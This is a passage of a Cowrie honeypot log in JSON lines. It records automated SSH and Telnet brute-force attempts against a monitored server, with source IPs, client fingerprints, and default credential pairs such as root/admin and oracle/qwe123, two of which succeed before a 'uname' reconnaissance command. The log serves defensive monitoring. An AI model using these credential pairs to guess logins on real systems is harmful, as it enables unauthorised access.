0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:30:05.959287Z","src_ip":"41.226.27.251","session":"ccbf351000ae"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:30:06.092521Z","src_ip":"41.226.27.251","session":"ccbf351000ae"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:30:06.662129Z","src_ip":"41.226.27.251","session":"ccbf351000ae"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:30:06.662986Z","src_ip":"41.226.27.251","session":"ccbf351000ae"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:30:06.708128Z","src_ip":"41.226.27.251","session":"ccbf351000ae"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:30:06.709253Z","src_ip":"41.226.27.251","session":"ccbf351000ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40990,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e56b850c349","protocol":"ssh","message":"New connection: 212.227.235.229:40990 (1.2.3.4:22) [session: 4e56b850c349]","sensor":"my-vps","timestamp":"2025-08-31T02:30:10.922723Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:30:11.694304Z","src_ip":"212.227.235.229","session":"4e56b850c349"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:30:11.695089Z","src_ip":"212.227.235.229","session":"4e56b850c349"}
{"eventid":"cowrie.login.failed","username":"es","password":"123456","message":"login attempt [es/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:30:17.864683Z","src_ip":"212.227.235.229","session":"4e56b850c349"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:30:19.724511Z","src_ip":"212.227.235.229","session":"4e56b850c349"}
{"eventid":"cowrie.login.failed","username":"mongo","password":"123456","message":"login attempt [mongo/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:30:22.790004Z","src_ip":"212.227.235.229","session":"f7b38a67a925"}
{"eventid":"cowrie.session.connect","src_ip":"116.198.230.226","src_port":50820,"dst_ip":"1.2.3.4","dst_port":22,"session":"96e4b9e433cb","protocol":"ssh","message":"New connection: 116.198.230.226:50820 (1.2.3.4:22) [session: 96e4b9e433cb]","sensor":"my-vps","timestamp":"2025-08-31T02:30:25.161308Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:30:25.162186Z","src_ip":"116.198.230.226","session":"96e4b9e433cb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:30:25.354339Z","src_ip":"116.198.230.226","session":"96e4b9e433cb"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":59154,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b602ee3e5e3","protocol":"ssh","message":"New connection: 41.226.27.251:59154 (1.2.3.4:22) [session: 7b602ee3e5e3]","sensor":"my-vps","timestamp":"2025-08-31T02:30:26.164973Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:30:26.182693Z","src_ip":"41.226.27.251","session":"7b602ee3e5e3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:30:26.209992Z","src_ip":"41.226.27.251","session":"7b602ee3e5e3"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin","message":"login attempt [gpadmin/gpadmin] failed","sensor":"my-vps","timestamp":"2025-08-31T02:30:26.388345Z","src_ip":"41.226.27.251","session":"7b602ee3e5e3"}
{"eventid":"cowrie.session.closed","duration":"62.9","message":"Connection lost after 62.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:30:27.343860Z","src_ip":"212.227.235.229","session":"f7b38a67a925"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:30:27.746378Z","src_ip":"41.226.27.251","session":"7b602ee3e5e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57524,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbeeabb67008","protocol":"ssh","message":"New connection: 212.227.125.160:57524 (1.2.3.4:22) [session: dbeeabb67008]","sensor":"my-vps","timestamp":"2025-08-31T02:30:31.188461Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59696,"dst_ip":"1.2.3.4","dst_port":22,"session":"adfc87ff038b","protocol":"ssh","message":"New connection: 212.227.125.160:59696 (1.2.3.4:22) [session: adfc87ff038b]","sensor":"my-vps","timestamp":"2025-08-31T02:30:32.350687Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:30:32.950277Z","src_ip":"212.227.125.160","session":"adfc87ff038b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:30:32.951056Z","src_ip":"212.227.125.160","session":"adfc87ff038b"}
{"eventid":"cowrie.login.failed","username":"es","password":"123456","message":"login attempt [es/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:30:35.644813Z","src_ip":"212.227.125.160","session":"adfc87ff038b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:30:36.002424Z","src_ip":"212.227.125.160","session":"dbeeabb67008"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:30:36.003540Z","src_ip":"212.227.125.160","session":"dbeeabb67008"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:30:37.110443Z","src_ip":"212.227.125.160","session":"adfc87ff038b"}
{"eventid":"cowrie.session.connect","src_ip":"47.236.113.109","src_port":32894,"dst_ip":"1.2.3.4","dst_port":23,"session":"15f78af5cbc7","protocol":"telnet","message":"New connection: 47.236.113.109:32894 (1.2.3.4:23) [session: 15f78af5cbc7]","sensor":"my-vps","timestamp":"2025-08-31T02:30:39.461066Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":45052,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc9c6c94825a","protocol":"ssh","message":"New connection: 41.226.27.251:45052 (1.2.3.4:22) [session: dc9c6c94825a]","sensor":"my-vps","timestamp":"2025-08-31T02:30:46.685032Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:30:46.685973Z","src_ip":"41.226.27.251","session":"dc9c6c94825a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:30:46.730928Z","src_ip":"41.226.27.251","session":"dc9c6c94825a"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"qwe123","message":"login attempt [oracle/qwe123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:30:46.867941Z","src_ip":"41.226.27.251","session":"dc9c6c94825a"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:30:48.122006Z","src_ip":"41.226.27.251","session":"dc9c6c94825a"}
{"eventid":"cowrie.login.failed","username":"user","password":"111111","message":"login attempt [user/111111] failed","sensor":"my-vps","timestamp":"2025-08-31T02:30:49.769939Z","src_ip":"212.227.125.160","session":"dbeeabb67008"}
{"eventid":"cowrie.session.closed","duration":"22.3","message":"Connection lost after 22.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:30:53.485724Z","src_ip":"212.227.125.160","session":"dbeeabb67008"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49770,"dst_ip":"1.2.3.4","dst_port":22,"session":"77e27c677294","protocol":"ssh","message":"New connection: 212.227.235.229:49770 (1.2.3.4:22) [session: 77e27c677294]","sensor":"my-vps","timestamp":"2025-08-31T02:30:55.270539Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:30:56.245068Z","src_ip":"212.227.235.229","session":"77e27c677294"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:30:56.245735Z","src_ip":"212.227.235.229","session":"77e27c677294"}
{"eventid":"cowrie.login.failed","username":"user","password":"111111","message":"login attempt [user/111111] failed","sensor":"my-vps","timestamp":"2025-08-31T02:31:06.612608Z","src_ip":"212.227.235.229","session":"77e27c677294"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":44516,"dst_ip":"1.2.3.4","dst_port":22,"session":"42c6752c83ef","protocol":"ssh","message":"New connection: 41.226.27.251:44516 (1.2.3.4:22) [session: 42c6752c83ef]","sensor":"my-vps","timestamp":"2025-08-31T02:31:07.089306Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:31:07.142488Z","src_ip":"41.226.27.251","session":"42c6752c83ef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:31:07.144139Z","src_ip":"41.226.27.251","session":"42c6752c83ef"}
{"eventid":"cowrie.login.success","username":"root","password":"1","message":"login attempt [root/1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:31:07.336233Z","src_ip":"41.226.27.251","session":"42c6752c83ef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:31:07.450794Z","src_ip":"41.226.27.251","session":"42c6752c83ef"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:31:07.451481Z","src_ip":"41.226.27.251","session":"42c6752c83ef"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:31:07.503239Z","src_ip":"41.226.27.251","session":"42c6752c83ef"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:31:07.504699Z","src_ip":"41.226.27.251","session":"42c6752c83ef"}
{"eventid":"cowrie.session.closed","duration":30.66726803779602,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:31:10.128262Z","src_ip":"47.236.113.109","session":"15f78af5cbc7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50200,"dst_ip":"1.2.3.4","dst_port":22,"session":"887303630815","protocol":"ssh","message":"New connection: 212.227.235.229:50200 (1.2.3.4:22) [session: 887303630815]","sensor":"my-vps","timestamp":"2025-08-31T02:31:11.426770Z"}
{"eventid":"cowrie.session.closed","duration":"16.6","message":"Connection lost after 16.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:31:11.871785Z","src_ip":"212.227.235.229","session":"77e27c677294"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:31:12.146703Z","src_ip":"212.227.235.229","session":"887303630815"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:31:12.147428Z","src_ip":"212.227.235.229","session":"887303630815"}
